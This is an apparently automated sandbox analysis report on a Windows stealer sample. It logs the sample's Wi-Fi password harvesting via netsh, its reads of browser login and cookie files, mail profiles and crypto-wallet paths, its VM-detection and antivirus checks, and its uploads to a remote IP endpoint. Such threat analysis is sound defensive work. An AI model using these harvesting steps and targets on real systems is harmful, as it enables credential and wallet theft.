      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr AllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp3937.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp3937.tmp.batJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr AllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 4236Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /NobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 4236Jump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductIdJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeQueries volume information: C:\Users\user\Desktop\3K5MXGVOJE.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Lowering of HIPS / PFW / Operating System Security Settings

      barindex
      Uses netsh to modify the Windows network and firewall settings
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
      Source: Amcache.hve.LOG1.18.dr, Amcache.hve.18.drBinary or memory string: msmpeng.exe
      Source: Amcache.hve.LOG1.18.dr, Amcache.hve.18.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
      Source: Amcache.hve.18.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.2107.4-0\msmpeng.exe
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1068685690.000000000572B000.00000004.00000020.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1071835301.0000000007780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
      Source: Amcache.hve.LOG1.18.dr, Amcache.hve.18.drBinary or memory string: MsMpEng.exe
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

      Stealing of Sensitive Information

      barindex
      Found many strings related to Crypto-Wallets (likely being stolen)
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002CBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002D13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: JaxxxLiberty
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002CBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: r4C:\Users\user\AppData\Roaming\Exodus\exodus.wallett-
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002CBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: r1C:\Users\user\AppData\Roaming\Ethereum\keystoret-
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002D13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002CBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002CBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: r5C:\Users\user\AppData\Local\Coinomi\Coinomi\walletst-
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1076558748.00000000707CB000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: get_MachineKeyStore
      Tries to harvest and steal Bitcoin Wallet information
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
      Tries to harvest and steal WLAN passwords
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr AllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqliteJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldbJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.dbJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000004.logJump to behavior
      Tries to steal Mail credentials (via file / registry access)
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
      Source: Yara matchFile source: 00000000.00000002.1061396393.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: 3K5MXGVOJE.exe PID: 4236, type: MEMORYSTR

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting      		Valid Accounts831
      Windows Management Instrumentation      		1
      Scripting      		1
      DLL Side-Loading      		111
      Disable or Modify Tools      		1
      OS Credential Dumping      		1
      File and Directory Discovery      		Remote Services1
      Archive Collected Data      		1
      Ingress Tool Transfer      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Native API      		1
      DLL Side-Loading      		11
      Process Injection      		2
      Obfuscated Files or Information      		LSASS Memory134
      System Information Discovery      		Remote Desktop Protocol2
      Data from Local System      		1
      Encrypted Channel      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
      Software Packing      		Security Account Manager931
      Security Software Discovery      		SMB/Windows Admin Shares1
      Email Collection      		11
      Non-Standard Port      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Timestomp      		NTDS62
      Virtualization/Sandbox Evasion      		Distributed Component Object Model1
      Clipboard Data      		3
      Non-Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading      		LSA Secrets3
      Process Discovery      		SSHKeylogging3
      Application Layer Protocol      		Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts62
      Virtualization/Sandbox Evasion      		Cached Domain Credentials1
      Application Window Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
      Process Injection      		DCSync1
      System Network Configuration Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1568316 Sample: 3K5MXGVOJE.exe Startdate: 04/12/2024 Architecture: WINDOWS Score: 100 42 90.168.9.0.in-addr.arpa 2->42 44 icanhazip.com 2->44 50 Suricata IDS alerts for network traffic 2->50 52 Antivirus / Scanner detection for submitted sample 2->52 54 Sigma detected: Capture Wi-Fi password 2->54 56 5 other signatures 2->56 8 3K5MXGVOJE.exe 15 29 2->8         started        signatures3 process4 dnsIp5 46 89.23.100.233, 1489, 49712 MAXITEL-ASRU Russian Federation 8->46 48 icanhazip.com 104.16.185.241, 49711, 80 CLOUDFLARENETUS United States 8->48 58 Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines) 8->58 60 Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines) 8->60 62 Queries sensitive printer information (via WMI, Win32_Printer, often done to detect virtual machines) 8->62 64 11 other signatures 8->64 12 cmd.exe 1 8->12         started        15 cmd.exe 1 8->15         started        17 WerFault.exe 21 16 8->17         started        20 cmd.exe 1 8->20         started        signatures6 process7 file8 66 Uses netsh to modify the Windows network and firewall settings 12->66 68 Tries to harvest and steal WLAN passwords 12->68 22 tasklist.exe 1 12->22         started        24 conhost.exe 12->24         started        26 netsh.exe 2 15->26         started        28 conhost.exe 15->28         started        30 findstr.exe 1 15->30         started        32 chcp.com 1 15->32         started        40 C:\ProgramData\Microsoft\...\Report.wer, Unicode 17->40 dropped 34 taskkill.exe 1 20->34         started        36 conhost.exe 20->36         started        38 2 other processes 20->38 signatures9 process10

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      3K5MXGVOJE.exe100%AviraHEUR/AGEN.1309950
      3K5MXGVOJE.exe50%ReversingLabsByteCode-MSIL.Backdoor.FormBook
      3K5MXGVOJE.exe100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://89.23.100.233:14890%Avira URL Cloudsafe
      http://89.23.100.233:1489/uploadt0%Avira URL Cloudsafe
      http://beta.visualstudio.net/net/sdk/feedback.asp0%Avira URL Cloudsafe
      http://89.23.100.233:1489/upload0%Avira URL Cloudsafe
      http://upx.sf.net0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      icanhazip.com
      		104.16.185.241
      		truefalse
        		high
        90.168.9.0.in-addr.arpa
        		unknown
        		unknowntrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://icanhazip.com/false
            		high
            http://89.23.100.233:1489/uploadtrue
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://beta.visualstudio.net/net/sdk/feedback.asp3K5MXGVOJE.exe, 00000000.00000002.1076558748.0000000070BD1000.00000020.00000001.01000000.00000008.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://ac.ecosia.org/autocomplete?q=tmpF56F.tmp.dat.0.drfalse
              		high
              https://www.google.com/images/branding/product/ico/googleg_alldp.ico3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E52000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D07000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D62000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1072336540.00000000078AC000.00000004.00000020.00020000.00000000.sdmp, tmpF572.tmp.dat.0.dr, tmpF571.tmp.dat.0.dr, tmpF56F.tmp.dat.0.drfalse
                		high
                https://duckduckgo.com/chrome_newtab3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E52000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D07000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E7C000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D62000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1072336540.00000000078AC000.00000004.00000020.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E9A000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, tmpF54B.tmp.dat.0.dr, tmpF572.tmp.dat.0.dr, tmpF54C.tmp.dat.0.dr, tmpF571.tmp.dat.0.dr, tmpF54D.tmp.dat.0.dr, tmpF56F.tmp.dat.0.drfalse
                  		high
                  https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E52000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D07000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E7C000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D62000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1072336540.00000000078AC000.00000004.00000020.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E9A000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, tmpF54B.tmp.dat.0.dr, tmpF572.tmp.dat.0.dr, tmpF54C.tmp.dat.0.dr, tmpF571.tmp.dat.0.dr, tmpF54D.tmp.dat.0.dr, tmpF56F.tmp.dat.0.drfalse
                    		high
                    http://89.23.100.233:1489/uploadt3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002D59000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/ac/?q=tmpF56F.tmp.dat.0.drfalse
                      		high
                      https://www.google.com/images/branding/product/ico/googleg_lodp.ico3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E7C000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E9A000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, tmpF54B.tmp.dat.0.dr, tmpF54C.tmp.dat.0.dr, tmpF54D.tmp.dat.0.drfalse
                        		high
                        https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E52000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D07000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E7C000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D62000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1072336540.00000000078AC000.00000004.00000020.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E9A000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, tmpF54B.tmp.dat.0.dr, tmpF572.tmp.dat.0.dr, tmpF54C.tmp.dat.0.dr, tmpF571.tmp.dat.0.dr, tmpF54D.tmp.dat.0.dr, tmpF56F.tmp.dat.0.drfalse
                          		high
                          http://89.23.100.233:14893K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002D59000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmpF56F.tmp.dat.0.drfalse
                            		high
                            http://upx.sf.netAmcache.hve.18.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://icanhazip.com3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002CBD000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://www.ecosia.org/newtab/3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E52000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D07000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D62000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1072336540.00000000078AC000.00000004.00000020.00020000.00000000.sdmp, tmpF572.tmp.dat.0.dr, tmpF571.tmp.dat.0.dr, tmpF56F.tmp.dat.0.drfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002CBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmpF56F.tmp.dat.0.drfalse
                                    		high
                                    https://gemini.google.com/app?q=tmpF56F.tmp.dat.0.drfalse
                                      		high

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      89.23.100.233
                                      		unknownRussian Federation
                                      		48687MAXITEL-ASRUtrue
                                      104.16.185.241
                                      		icanhazip.comUnited States
                                      		13335CLOUDFLARENETUSfalse

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1568316
                                      Start date and time:2024-12-04 14:49:11 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 10m 0s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                      Run name:Suspected VM Detection
                                      Number of analysed new started processes analysed:28
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:3K5MXGVOJE.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@25/20@2/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 217
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WerFault.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 52.182.143.212
                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, c.pki.goog
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenFile calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                      • VT rate limit hit for: 3K5MXGVOJE.exe

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      08:54:02API Interceptor69x Sleep call for process: 3K5MXGVOJE.exe modified
                                      08:54:13API Interceptor1x Sleep call for process: WerFault.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      89.23.100.233VaXmr82RIb.exeGet hashmaliciousUnknownBrowse
                                      • 89.23.100.233:1488/upload
                                      104.16.185.241K6aOw2Jmji.exeGet hashmaliciousStealeriumBrowse
                                      • icanhazip.com/
                                      jpiWvvEcbp.exeGet hashmaliciousStealeriumBrowse
                                      • icanhazip.com/
                                      VzhY4BcvBH.exeGet hashmaliciousAsyncRAT, RedLine, StormKitty, VenomRATBrowse
                                      • icanhazip.com/
                                      L814CyOxMT.exeGet hashmaliciousFlesh Stealer, PureLog Stealer, zgRATBrowse
                                      • icanhazip.com/
                                      GsZkXAmf61.exeGet hashmaliciousCelestial Rat, EICARBrowse
                                      • icanhazip.com/
                                      REQUEST FOR QUOTATION.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                      • icanhazip.com/
                                      Company profile.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                      • icanhazip.com/
                                      RFQ.vbsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                      • icanhazip.com/
                                      HONG_KONG_CHEMHERE_QUOTE_REQUEST.vbsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                      • icanhazip.com/
                                      System.exeGet hashmaliciousFlesh Stealer, XmrigBrowse
                                      • icanhazip.com/

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      icanhazip.comVaXmr82RIb.exeGet hashmaliciousUnknownBrowse
                                      • 104.16.184.241
                                      Pdf Reader.exeGet hashmaliciousStealeriumBrowse
                                      • 104.16.184.241
                                      gKWbina3a4.batGet hashmaliciousStealeriumBrowse
                                      • 104.16.184.241
                                      K6aOw2Jmji.exeGet hashmaliciousStealeriumBrowse
                                      • 104.16.185.241
                                      uyz4YPUyc9.exeGet hashmaliciousStealeriumBrowse
                                      • 104.16.184.241
                                      yv7QsAR49V.exeGet hashmaliciousStealeriumBrowse
                                      • 104.16.184.241
                                      jpiWvvEcbp.exeGet hashmaliciousStealeriumBrowse
                                      • 104.16.185.241
                                      5E3zWXveDN.exeGet hashmaliciousStealeriumBrowse
                                      • 104.16.184.241
                                      LKxcbzlwkz.exeGet hashmaliciousAveMaria, KeyLogger, StealeriumBrowse
                                      • 104.16.184.241
                                      VzhY4BcvBH.exeGet hashmaliciousAsyncRAT, RedLine, StormKitty, VenomRATBrowse
                                      • 104.16.185.241

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      CLOUDFLARENETUShttps://www.aviatorsharkao.com.br/atuussGet hashmaliciousUnknownBrowse
                                      • 104.21.43.244
                                      file.exeGet hashmaliciousAmadey, Discord Token Stealer, DotStealer, LummaC Stealer, Stealc, VidarBrowse
                                      • 172.67.181.44
                                      RzLnOTy9k3.lnkGet hashmaliciousLummaC StealerBrowse
                                      • 172.67.209.252
                                      VaXmr82RIb.exeGet hashmaliciousUnknownBrowse
                                      • 104.16.184.241
                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                      • 172.67.165.166
                                      QsEn4Jw9pY.lnkGet hashmaliciousUnknownBrowse
                                      • 172.67.201.111
                                      https://cdn.tailwindcss.comGet hashmaliciousUnknownBrowse
                                      • 104.22.21.144
                                      fiyati_teklif 65W20_ B#U00fcy#U00fck BID mokapto Sipari#U015fi jpeg docx _ .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 172.67.177.134
                                      ylNk78QlB8.lnkGet hashmaliciousUnknownBrowse
                                      • 172.67.201.111
                                      sF5nNt8usL.batGet hashmaliciousUnknownBrowse
                                      • 172.64.41.3
                                      MAXITEL-ASRUVaXmr82RIb.exeGet hashmaliciousUnknownBrowse
                                      • 89.23.100.233
                                      Installer_setup32_64x.exeGet hashmaliciousLummaC, StealcBrowse
                                      • 89.23.96.109
                                      9fGsCDYKLV.exeGet hashmaliciousFlesh StealerBrowse
                                      • 89.23.100.233
                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                      • 89.23.100.233
                                      file.exeGet hashmaliciousFlesh StealerBrowse
                                      • 89.23.100.233
                                      L814CyOxMT.exeGet hashmaliciousFlesh Stealer, PureLog Stealer, zgRATBrowse
                                      • 89.23.100.233
                                      vbe11TPn2x.exeGet hashmaliciousFlesh StealerBrowse
                                      • 89.23.100.233
                                      Ham9SAD0Ou.docGet hashmaliciousUnknownBrowse
                                      • 89.23.98.98
                                      file.dllGet hashmaliciousMatanbuchusBrowse
                                      • 89.23.113.220
                                      file.dllGet hashmaliciousMatanbuchusBrowse
                                      • 89.23.113.220

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3K5MXGVOJE.exe_541db9c4469fc328c496e5732c3935fdd8a9477_ea0cb2f5_58a5f322-e073-42be-a021-99eb63652c5f\Report.wer

                                      Download File
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.4428323511368455
                                      Encrypted:false
                                      SSDEEP:192:/MX0HMXm66nmWbk9auo75E6UVW/I2/FHdDu76cfAIO84:kX0+muWbk9al5EgVF9Du76cfAIO84
                                      MD5:6120592CFD2AB963685A3120C2F48874
                                      SHA1:2497DF4632CD907070EB91D7C800722AC0634DE2
                                      SHA-256:2B7DE7A1A7E545DC661AC79D18C0E8F4007FE1019091B1492BC2E2AF72477AC5
                                      SHA-512:B74996179D6C9AA7682A2AD8CE19CDE1F32B011B2827076E106923805CD1A9CC25CBB72E3A0E28256E6825C41D7E6C95F616F065393AB1CC072BAAD87B9C46B8
                                      Malicious:true
